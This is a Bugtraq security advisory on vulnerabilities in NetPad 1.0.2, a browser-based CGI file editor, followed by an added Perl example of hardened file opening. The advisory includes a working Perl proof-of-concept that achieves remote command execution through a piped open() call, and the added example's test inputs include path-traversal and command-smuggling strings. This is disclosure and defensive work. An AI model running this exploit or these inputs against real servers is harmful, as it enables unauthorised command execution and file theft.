Bugtraq mailing list archives


LevCGI.coms NetPad 1.0.2 multiple vulnerabilities


From: "BrainRawt ." <brainrawt () hotmail com>
Date: Tue, 14 May 2002 01:44:28 +0000

Levcgi.coms NetPad 1.0.2 Multiple Vulnerabilities Advisory
Discovered By b0iler (b0iler () hotmail com) and BrainRawt (brainrawt () hotmail com)

About Netpad:
------------------
<quote from levcgi.com>
Easy to install and use text editor for your web browser! This NotePad like
program allows you to open your files and pages online in your browser and
edit their contents through the browser without forcing you to re-upload
your changes all the time! Extremely efficient and a must have tool for all
webmasters!
</quote from levcgi.com>

According to the website,  ...NetPad has been downloaded 1225 times!

Vulnerable (tested) Versions:
--------------------
NetPad v 1.0.2

Vendor Contact:
----------------
4-28-02 - Emailed lev () taintedthoughts com

Vulnerabilities:

-- Password Bypass

1. The website claims "password security feature to prevent unauthorized access!",
   but this is NOT true.
   A password is not required to read files. It is only required to write to files.

-- Path Traversal

2. Improper filtering of input allows one to enter the traditional "../../../" into the
   input field to crawl back through directories of the server hosting netpad.cgi,
   allowing one to view any file readable by the webserver.

-- Command Execution

3. Due to improper usage of the open() function and input filtering, it is
   possible for a malicious visitor to remotely execute commands on the server hosting
   netpad.cgi

   Proof of Concept code can be found below............

Remote Command Execution Exploit (POC):
---------------------------------------
#!/usr/bin/perl
# exploit for levcgi's NetPad 1.0.2
#
# This could easily be done with any browser and a little effort.
#
# requires LWP available at
# http://www.linpro.no/lwp/libwww-perl-5.64.tar.gz
# also, the number of ../'s differs.  It depends on what $basedir
# is set to in the netpad.cgi script
#
# usage: perl script.pl http://site.tld/cgi-bin/netpad.cgi ../../../../bin/command

use LWP::UserAgent;
$ua = new LWP::UserAgent;
$ua->agent("your open call can be exploited" . $ua->agent);
my $req = new HTTP::Request POST => $ARGV[0];
$req->content_type('application/x-www-form-urlencoded');
foreach(@ARGV){ $of .= "$_ " unless($_ eq $ARGV[0]); }
$req->content("proc=open&of=${of}|");
my $res = $ua->request($req);
if ($res->is_success) { print $res->content . "\n\nit should have worked.\n"; }
else {  print "request failed.\n"; }

Fix:
------
No matter how well one filters input to this program, we recommend that the
program itself be protected by htaccess.

--------------------------------------------------------------------------
Did you (Lev) say something about stupid people doing stupid things? -BrainRawt
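The open() misuse and path traversal described in the advisory above, seen from the fixing side. This is an added example, not part of the original post and not NetPad's code; it shows a three-argument open combined with a canonical-path check. The names $BASEDIR and safe_open and the demo file are assumptions made for illustration.

```perl
#!/usr/bin/perl
# Added example (not NetPad's code): opening a user-named file safely.
use strict;
use warnings;
use Cwd qw(realpath);
use File::Temp qw(tempdir);
use File::Spec;

# Assumed editor root; a temp dir here so the demo runs anywhere.
my $BASEDIR = realpath(tempdir(CLEANUP => 1));

# Unsafe pattern the advisory describes: two-argument open() lets the
# string choose the mode, so a trailing "|" turns the "file name" into a
# command to run. Shown only as a comment:
#     open(FILE, $of);

# Hardened form: returns a read handle, or undef if the request is refused.
sub safe_open {
    my ($name) = @_;
    return unless defined $name && length $name;
    return if $name =~ /\0/;                      # no embedded NULs
    # Resolve "..", symlinks and duplicate slashes to one canonical path.
    my $path = realpath(File::Spec->catfile($BASEDIR, $name));
    return unless defined $path;                  # could not be resolved
    # The canonical path must still be inside $BASEDIR.
    return unless index($path, "$BASEDIR/") == 0;
    return unless -f $path;                       # existing regular files only
    # Three-argument open: the mode is fixed to "<", so "|" or ">" in the
    # name are literal characters, never a pipe or a redirect.
    open(my $fh, '<', $path) or return;
    return $fh;
}

# Constructed sample file and requests.
open(my $out, '>', File::Spec->catfile($BASEDIR, 'index.html')) or die $!;
print {$out} "<html>ok</html>\n";
close $out;

for my $req ('index.html', '../../../etc/passwd', '../../../bin/id |', 'index.html|') {
    my $fh = safe_open($req);
    printf "%-24s %s\n", $req, $fh ? 'opened' : 'refused';
    close $fh if $fh;
}
```

Only the first request is opened; the other three are refused. This check covers the read path only and does not replace the access control the advisory recommends.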
